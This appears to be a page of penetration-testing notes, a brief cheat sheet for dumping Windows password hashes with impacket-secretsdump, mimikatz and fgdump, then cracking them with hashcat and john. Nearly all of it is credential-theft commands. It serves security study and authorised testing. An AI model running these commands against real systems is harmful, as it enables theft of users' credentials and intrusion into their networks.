Password Hash Dumping

Password Hash Dumping

*Using Impacket-secretdump

impacket-secretdump “<domain>/<user>:<password>@<ip>”

*Using mimikatz

  1. Transfer all 3 mimikatz file to run mimikatz.exe from /usr/share/windows-resources/mimikatz/ mimikatz.exe

  2. Give privilege access privilege::debug

  3. sekurlsa::logonpasswords

retrieve password hash

  • If somehow mimikatz don’t work.. try in single command ./mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit”

*Using fsdump

  • transfer from usr/share/windows-resources/binaries/fgdump/fgdump.exe

  • fgdump.exe

  • 127.0.0.1.pwdump will have all hashes

Crack

  • hashcat -m 1000 hash rockyou.txt

  • john –format=nt hash –wordlist=rockyou.txt

PreviousAuthenticationNextService Account Attack Kerberoasting Attack

Last updated